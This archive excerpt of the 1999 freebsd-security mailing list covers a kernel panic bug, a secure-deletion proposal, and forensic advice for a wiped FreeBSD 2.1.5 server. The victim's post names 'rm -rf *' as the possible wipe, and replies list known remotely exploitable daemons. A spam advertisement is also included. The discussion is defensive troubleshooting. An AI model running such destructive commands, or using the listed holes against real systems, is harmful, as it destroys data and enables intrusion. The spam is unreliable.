brett@lariat.org (Brett Glass) Date: Wed, 19 May 1999 10:57:08 -0300 (GMT) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Brett Glass escribió: > Has the "double free" problem that causes the system to crash under a > SYN flood attack been fixed? [...] On the same line: was the VM bug that was triggered by the screensaver fixed? Regards! Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 13:39:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 40EC614CF2 for ; Wed, 19 May 1999 13:39:35 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA63615; Wed, 19 May 1999 14:38:27 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA01429; Wed, 19 May 1999 14:38:19 -0600 (MDT) Message-Id: <199905192038.OAA01429@harmony.village.org> To: Brett Glass Subject: Re: Is 3.2-R safe? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Tue, 18 May 1999 11:09:12 MDT." <4.2.0.37.19990518110133.00b58da0@localhost> References: <4.2.0.37.19990518110133.00b58da0@localhost> Date: Wed, 19 May 1999 14:38:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.37.19990518110133.00b58da0@localhost> Brett Glass writes: : Just saw the announcement of 3.2-R. We'd been planning to migrate : some of our systems to this version, but before we install, we need : to know: Has the "double free" problem that causes the system to : crash under a SYN flood attack been fixed? I don't recall a "fix" for this going into -current, let alone -stable. It all came to light very late in the 3.2 game, and no body posted a good patch, as far as I can recall. The one patch that was posted was panned as being bad. I had planned on setting up a 3.2R system to see if this, and a small list of other problems, has been fixed or not. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 13:42:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C496614CF2 for ; Wed, 19 May 1999 13:42:32 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA63631; Wed, 19 May 1999 14:41:23 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA01463; Wed, 19 May 1999 14:41:14 -0600 (MDT) Message-Id: <199905192041.OAA01463@harmony.village.org> To: "Ilmar S. Habibulin" Subject: Re: secure deletion Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 19 May 1999 16:01:45 +0400." References: Date: Wed, 19 May 1999 14:41:14 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "Ilmar S. Habibulin" writes: : May be it's an freebsd-fs@ question, but i think that it belings here to. : I heard that some linux fs (maybe extfs2?) have some secure deletion flag, : which being set on inode(file or dir) cause content of this file to be : wiped before deletion, so even if somebody manage to restore file, its : content would be unusable. I think, that it is nice feature, and i would : like to see it in freebsd. What would you say? : : PS. I have implementation of this feature for freebsd-2.2.5. May be i can : port it to 3.x. Does it doe the DoD recommended patter of deletion? That is overwrite the blocks with sever different series of bit patterns to make it impossible to recover using the usual techniques, or is it just a bzero of the blocks in question? The former is secure deletion, the latter is too insecure for most people that want this feature... Warner P.S. I do think a port of even the latter would be a good thing. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 16:24:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 8569C157D2 for ; Wed, 19 May 1999 16:24:50 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA19752; Wed, 19 May 1999 17:24:43 -0600 (MDT) Message-Id: <4.2.0.37.19990519171457.045fc350@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Wed, 19 May 1999 17:17:20 -0600 To: Warner Losh From: Brett Glass Subject: Re: Is 3.2-R safe? Cc: security@FreeBSD.ORG In-Reply-To: <199905192038.OAA01429@harmony.village.org> References: <4.2.0.37.19990518110133.00b58da0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In that case, it probably still needs fixing. What concerns me is that this error may be triggered by other things besides just SYN floods. Any heavy load might do it. And then, you'll get kernel panics. Not good. I'd like to do the patch, but I'm not up on the mysteries of that particular part of the kernel -- and the source isn't exactly well commented. Who is the person who has most recently tinkered with that code? --Brett Glass >I don't recall a "fix" for this going into -current, let alone >-stable. It all came to light very late in the 3.2 game, and no body >posted a good patch, as far as I can recall. The one patch that was >posted was panned as being bad. I had planned on setting up a 3.2R >system to see if this, and a small list of other problems, has been >fixed or not. > >Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 21: 6:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from tyr.agrknives.com (tyr.hos.net [205.238.129.41]) by hub.freebsd.org (Postfix) with ESMTP id E4B6214C83 for ; Wed, 19 May 1999 21:06:53 -0700 (PDT) (envelope-from arussell@tyr.agrknives.com) Received: (from arussell@localhost) by tyr.agrknives.com (8.8.8/8.8.8) id XAA16431 for freebsd-security@freebsd.org; Wed, 19 May 1999 23:03:26 -0500 (CDT) (envelope-from arussell) From: "Andrew G. Russell" Message-Id: <199905200403.XAA16431@tyr.agrknives.com> Subject: attack or failure To: freebsd-security@freebsd.org Date: Wed, 19 May 1999 23:03:26 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Last night, a system that has been running FreeBSD 2.1.5 for a number of years with the last upgrade being sendmail 8.8.4 being added. Three filesystems were cleared out, I don't know if newfs or rm -rf * were used on them. the filesystems were /x(local/src/obj...) /var /tmp the of course covers up the track quite nicely. the mod times on /tmp is May 18 21:09, on /var May 18 21:09 and on /x May 18 21:33 this being an old system, when I could not get at the /x filesystem, I rebooted. This system will be upgraded to 2.2.8, but I sure would like some clue as to how it happened. Thanks in advance for any help/thoughts. A.G. Russell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 21:22:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 198E714D1A for ; Wed, 19 May 1999 21:22:52 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Wed, 19 May 1999 22:22:48 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma019804; Wed, 19 May 99 22:22:41 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id WAA15649; Wed, 19 May 1999 22:22:03 -0600 (MDT) Date: Wed, 19 May 1999 22:22:02 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: "Andrew G. Russell" Cc: freebsd-security@FreeBSD.ORG Subject: Re: attack or failure In-Reply-To: <199905200403.XAA16431@tyr.agrknives.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 19 May 1999, Andrew G. Russell wrote: > This system will be upgraded to 2.2.8, but I sure would like some clue as > to how it happened. Were you running a POP or IMAP server? If so, what version? There are well-known and quite easily exploited holes in the University of Washington IMAP2bis and IMAP4 servers and the Qualcomm POP server, and exploits are publically available and in widespread use. Each exploit gives a remote attacker an instant root shell on your system. You mention using sendmail 8.8.4, which I also recall had an exploitable buffer overflow in the MIME decoding code, which in theory could also be possible avenue of remote attack, though I am not aware of any public exploits for this hole. Now if the attack could have been initiated locally by a user with shell access on your system, there are many other known holes in versions of FreeBSD as old as 2.1.5, such as the suidperl buffer overflow, the rdist buffer overflow, the procfs hole, or the lpr buffer overflow, to name a few. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 21:25:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id F3B0B14E1B for ; Wed, 19 May 1999 21:25:31 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id VAA04682; Wed, 19 May 1999 21:23:48 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id VAA06832; Wed, 19 May 1999 21:23:48 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA19650; Wed, 19 May 99 21:23:41 PDT Message-Id: <37438E4C.4B95B937@softweyr.com> Date: Wed, 19 May 1999 22:23:40 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Warner Losh Cc: "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <199905192041.OAA01463@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > In message "Ilmar S. Habibulin" writes: > : May be it's an freebsd-fs@ question, but i think that it belings here to. > : I heard that some linux fs (maybe extfs2?) have some secure deletion flag, > : which being set on inode(file or dir) cause content of this file to be > : wiped before deletion, so even if somebody manage to restore file, its > : content would be unusable. I think, that it is nice feature, and i would > : like to see it in freebsd. What would you say? > : > : PS. I have implementation of this feature for freebsd-2.2.5. May be i can > : port it to 3.x. > > Does it doe the DoD recommended patter of deletion? That is overwrite > the blocks with sever different series of bit patterns to make it > impossible to recover using the usual techniques, or is it just a > bzero of the blocks in question? The former is secure deletion, the > latter is too insecure for most people that want this feature... The standard used to be 100 overwrites of 0xe5 then 0x5e, but they changed the standard just as I was leaving the defense industry in 1991. Does Posix or SUS have anything to say about this? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 22:19:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from portao.jornaldobrasil.com.br (portao.jornaldobrasil.com.br [200.229.231.66]) by hub.freebsd.org (Postfix) with SMTP id 4502614C56 for ; Wed, 19 May 1999 22:19:13 -0700 (PDT) (envelope-from remove@hitsubmitter.com) Received: from i199-1.orl-fl.oltronics.net by portao.jornaldobrasil.com.br (AIX 4.1/UCB 5.64/4.03) id AA43014; Thu, 20 May 1999 03:27:03 -0200 Date: Thu, 20 May 1999 03:27:03 -0200 Message-Id: <9905200527.AA43014@portao.jornaldobrasil.com.br> From: "D.Reynolds" To: Reply-To: remove@hitsubmitter.com Subject: "FREE DOWNLOAD" Register Your Web Site On Over 900+ Search Engines "INSTANTLY" Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To remove your name from our mailing list immediately, please refer to the statement at the bottom of this message. ====================================================================== "FREE DOWNLOAD".Register Your Web Site To Over 900+ Search Engines "Instantly". Latest Version 5.00 Just released Today! I would like to inform you about a new, and exciting award winning product that will save you both countless hours, and increase your exposure on the Internet immeasurably! Known as the Submission Wizard our program offers web users such as yourself, the ability to automatically submit your site to over 900+ search engines in just one session . Select from different categories, even countries, the choice is yours. The submission process is very simple, efficient, and most importantly fast. All you do is provide standard site information i.e. site name, address, description, and a few well chosen keywords. The Submission Wizard takes this information, and changes it into the format required by each different engine, then registers your web site. It's that simple! In addition, the Wizard's database of search engines and directories is constantly being updated every week, thus giving your site fresh and relevant exposure. Also the Wizard allows you to register multiple URL's. Just imagine the possibilities! Take charge of your web exposure, try out the Submission Wizard demo FREE by following the provided hyperlink. We know you'll be as excited about it as much as we are! For your "FREE DOWNLOAD" visit our site at www.hitsubmitter.com ======================================================== HOW TO GET YOUR BUSINESS TO #1 On The Seach Engines SEARCH ENGINE POSITIONING Want to see where your company is positioned on the search engines, then download a "free working copy" of our positioning software, 1.Generates HTML pages designed to rank near the top of the search results. 2.Analyzes your existing Web pages and gives plain-English advice on how to improve them. 3.Includes a simple, built-in HTML editor for fast and easy changes. 4.Assists in uploading your new and changed pages. 5.Submits your pages to the major search engines automatically. 6.Reports your positions on each search engine for each keyword you are targeting. 7.Tracks the number of visitors to your site, where they came from, and what keywords they used to find you. 8.And much, much more! Get you free download from WWW.hitsubmitter.com =========================================================== Thank you for your time, and good luck with your web promotion. D.Reynolds Customer Services. We are currently consolidating our many mailing lists and need to update our databases. Our records indicate that you may have inquired in the past. If this is not the case, please reply with "REMOVE" in the subject field to never receive email offers from this vendor. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 22:47:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id C823F14C83 for ; Wed, 19 May 1999 22:47:44 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id XAA00102; Wed, 19 May 1999 23:46:23 -0600 (MDT) From: David G Andersen Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id XAA18509; Wed, 19 May 1999 23:46:21 -0600 (MDT) Message-Id: <199905200546.XAA18509@lal.cs.utah.edu> Subject: Re: attack or failure To: arussell@tyr.agrknives.com (Andrew G. Russell) Date: Wed, 19 May 1999 23:46:21 -0600 (MDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199905200403.XAA16431@tyr.agrknives.com> from "Andrew G. Russell" at May 19, 99 11:03:26 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Before you create/touch/break anything on your filesystems, you'll most likely want to 'strings' the raw filesystem device and pipe it through either grep, or a little perl script, to look for syslog patterns. I've used it a few times in case of emergency (like the one you've described), and it tends to pick out most of the interesting syslog entries. Stick a floppy in, and do: strings /dev/sd0c | ./findsysl > /dev/fd0 (where findsysl is something like: #!/usr/bin/perl while () { if (/^[A-Z][a-z][a-z] +\d\d:\d\d:\d\d /) { print; } } Or pipe to 'more' to see if it's getting anything interesting. _don't_ cat it to the filesystem, because it'll clobber old data. More sophisticated recovery techniques exist, if there's anything critical on the system or you really want to find out what's going on. This'll get you 90% of what's there with little effort, though. -Dave Lo and behold, Andrew G. Russell once said: > > Last night, a system that has been running FreeBSD 2.1.5 for a number of > years with the last upgrade being sendmail 8.8.4 being added. > > Three filesystems were cleared out, I don't know if newfs or rm -rf * were > used on them. > > the filesystems were /x(local/src/obj...) /var /tmp > the of course covers up the track quite nicely. > > the mod times on /tmp is May 18 21:09, on /var May 18 21:09 and on /x > May 18 21:33 > > this being an old system, when I could not get at the /x filesystem, I rebooted. > > This system will be upgraded to 2.2.8, but I sure would like some clue as > to how it happened. > > Thanks in advance for any help/thoughts. > > A.G. Russell > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 22:59:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id CA36515266 for ; Wed, 19 May 1999 22:59:45 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id JAA06264; Thu, 20 May 1999 09:59:42 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id JAA18006; Thu, 20 May 1999 09:59:40 +0400 (MSD) Date: Thu, 20 May 1999 09:59:40 +0400 (MSD) From: "Ilmar S. Habibulin" To: Warner Losh Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905192041.OAA01463@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 19 May 1999, Warner Losh wrote: > Does it doe the DoD recommended patter of deletion? That is overwrite > the blocks with sever different series of bit patterns to make it > impossible to recover using the usual techniques, or is it just a > bzero of the blocks in question? The former is secure deletion, the > latter is too insecure for most people that want this feature... Bzero can be changed to some other function, is suppose that this is not a question. The question is if this thing is needed by comunity. > P.S. I do think a port of even the latter would be a good thing. So you vote for it. ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 23:25:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1219114E66 for ; Wed, 19 May 1999 23:25:32 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA64678; Thu, 20 May 1999 00:24:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA04145; Thu, 20 May 1999 00:24:20 -0600 (MDT) Message-Id: <199905200624.AAA04145@harmony.village.org> To: "Ilmar S. Habibulin" Subject: Re: secure deletion Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 20 May 1999 09:59:40 +0400." References: Date: Thu, 20 May 1999 00:24:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "Ilmar S. Habibulin" writes: : Bzero can be changed to some other function, is suppose that this is not a : question. The question is if this thing is needed by comunity. There is a certain segment of the community that would use it. If there was zero overhead (beyond a bit compare on unlink) when not used, binary compatible with current disks and a fairly clean implementation, then I think that there would be support for its inclusion. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 23:42:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from firewall.reed.wattle.id.au (darren2.lnk.telstra.net [139.130.53.33]) by hub.freebsd.org (Postfix) with ESMTP id 792C014E7D for ; Wed, 19 May 1999 23:42:23 -0700 (PDT) (envelope-from darrenr@reed.wattle.id.au) Received: (from root@localhost) by firewall.reed.wattle.id.au (8.9.1/8.8.7) id GAA20493; Thu, 20 May 1999 06:42:20 GMT Received: from avalon.reed.wattle.id.au(192.168.1.1) by firewall.reed.wattle.id.au via smap (V1.3) id sma020491; Thu May 20 06:42:19 1999 Received: from percival.reed.wattle.id.au. (percival.reed.wattle.id.au [192.168.1.5]) by avalon.reed.wattle.id.au (8.9.0.Beta3/8.9.0.Beta3) with SMTP id QAA11368; Thu, 20 May 1999 16:42:19 +1000 (EST) From: Darren Reed Message-Id: <199905200642.QAA11368@avalon.reed.wattle.id.au> Subject: Re: secure deletion In-Reply-To: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm" To: wes@softweyr.com (Wes Peters) Date: Thu, 20 May 1999 16:42:18 +1000 (EST) Cc: imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL37 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some email I received from Wes Peters, sie wrote: > Warner Losh wrote: > > > > In message "Ilmar S. Habibulin" writes: > > : May be it's an freebsd-fs@ question, but i think that it belings here to. > > : I heard that some linux fs (maybe extfs2?) have some secure deletion flag, > > : which being set on inode(file or dir) cause content of this file to be > > : wiped before deletion, so even if somebody manage to restore file, its > > : content would be unusable. I think, that it is nice feature, and i would > > : like to see it in freebsd. What would you say? > > : > > : PS. I have implementation of this feature for freebsd-2.2.5. May be i can > > : port it to 3.x. > > > > Does it doe the DoD recommended patter of deletion? That is overwrite > > the blocks with sever different series of bit patterns to make it > > impossible to recover using the usual techniques, or is it just a > > bzero of the blocks in question? The former is secure deletion, the > > latter is too insecure for most people that want this feature... > > The standard used to be 100 overwrites of 0xe5 then 0x5e, but they > changed the standard just as I was leaving the defense industry in > 1991. Does Posix or SUS have anything to say about this? I'd worry about this sort of thing when and if FreeBSD is ever used for storing of (officially) classified/confidential material and even then, the solution is likely to be to take a hammer or drill to the disks. For normal users, who are very unlikely to have any worries about someone doing an in-depth magnetic scan of their disk, a singal overwrite will be just as effect as 100. Lets try being a little realistic, eh ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 19 23:49:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta1-rme.xtra.co.nz (mta.xtra.co.nz [203.96.92.1]) by hub.freebsd.org (Postfix) with ESMTP id 2D06D14E7D for ; Wed, 19 May 1999 23:49:44 -0700 (PDT) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker ([210.55.152.50]) by mta1-rme.xtra.co.nz (InterMail v04.00.02.07 201-227-108) with SMTP id <19990520065202.IDMD7869945.mta1-rme@wocker>; Thu, 20 May 1999 18:52:02 +1200 From: "Dan Langille" Organization: The FreeBSD Diary To: Darren Reed Date: Thu, 20 May 1999 18:49:40 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: secure deletion Reply-To: junkmale@xtra.co.nz Cc: freebsd-security@FreeBSD.ORG In-reply-to: <199905200642.QAA11368@avalon.reed.wattle.id.au> References: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm" X-mailer: Pegasus Mail for Win32 (v3.01d) Message-Id: <19990520065202.IDMD7869945.mta1-rme@wocker> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 20 May 99, at 16:42, Darren Reed wrote: > I'd worry about this sort of thing when and if FreeBSD is ever used for > storing of (officially) classified/confidential material and even then, > the solution is likely to be to take a hammer or drill to the disks. I know of at least one government department which drills through the platters when disposing of a disk drive. -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 0:33: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 24EEE14FFF for ; Thu, 20 May 1999 00:33:06 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id LAA09659; Thu, 20 May 1999 11:33:05 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id LAA20546; Thu, 20 May 1999 11:33:04 +0400 (MSD) Date: Thu, 20 May 1999 11:33:04 +0400 (MSD) From: "Ilmar S. Habibulin" To: Warner Losh Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905200624.AAA04145@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 20 May 1999, Warner Losh wrote: > There is a certain segment of the community that would use it. If > there was zero overhead (beyond a bit compare on unlink) when not > used, binary compatible with current disks and a fairly clean > implementation, then I think that there would be support for its > inclusion. My implementation was very simple. In order to secure ;-) delete file user have to set special flag (bit) of inode. I think, that i can use ufs flags field for that bit and chflags command. When i catch up situations of unlinking file, truncaing its size, i bzero unused blocks. While unlinking i found strange thing. I'm deleting blocks sequently from low blkno to high. If i change this sequence back to front (?) i've go no bzero'ed blocks at all. Maybe there is some other way of wiping blocks? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 1:37:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from hydrogen.fircrest.net (metriclient-2.uoregon.edu [128.223.172.2]) by hub.freebsd.org (Postfix) with ESMTP id EF3C414EBD for ; Thu, 20 May 1999 01:37:16 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by hydrogen.fircrest.net (8.9.1/8.8.7) id BAA08176; Thu, 20 May 1999 01:36:57 -0700 (PDT) Message-ID: <19990520013657.62702@hydrogen.nike.efn.org> Date: Thu, 20 May 1999 01:36:57 -0700 From: John-Mark Gurney To: David G Andersen Cc: "Andrew G. Russell" , freebsd-security@FreeBSD.ORG Subject: Re: attack or failure References: <199905200403.XAA16431@tyr.agrknives.com> <199905200546.XAA18509@lal.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: <199905200546.XAA18509@lal.cs.utah.edu>; from David G Andersen on Wed, May 19, 1999 at 11:46:21PM -0600 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 3.0-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David G Andersen scribbled this message on May 19: > More sophisticated recovery techniques exist, if there's anything critical > on the system or you really want to find out what's going on. This'll get > you 90% of what's there with little effort, though. I'm not sure how my program (ffsrecov in ports) handles deleted files (which it sounds like it is)... but it might help you to recover some data files... just as long as the directory bit hasn't been cleared on the inode... be warned though, right now I'm mmap'ing the file to do the work which means that you are seriously limited on the file system size, no 4gig fs's for this unless you're on an Alpha.. I haven't tested how large it can, but I've used it successfully for a 1.8gig fs... and right now ffsrecov doesn't open the file system for writing, so it won't cause any more damage... it's just made for extracting data from the file system... if you have any more ideas for ways of pulling data out of the file system, I'd like to know... > Lo and behold, Andrew G. Russell once said: > > > > Last night, a system that has been running FreeBSD 2.1.5 for a number of > > years with the last upgrade being sendmail 8.8.4 being added. > > > > Three filesystems were cleared out, I don't know if newfs or rm -rf * were > > used on them. > > > > the filesystems were /x(local/src/obj...) /var /tmp > > the of course covers up the track quite nicely. > > > > the mod times on /tmp is May 18 21:09, on /var May 18 21:09 and on /x > > May 18 21:33 > > > > this being an old system, when I could not get at the /x filesystem, I rebooted. > > > > This system will be upgraded to 2.2.8, but I sure would like some clue as > > to how it happened. -- John-Mark Gurney Voice: +1 541 684 8449 Cu Networking P.O. Box 5693, 97405 "The soul contains in itself the event that shall presently befall it. The event is only the actualizing of its thought." -- Ralph Waldo Emerson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 2:35:58 1999 Delivered-To: freebsd-security@freebsd.org 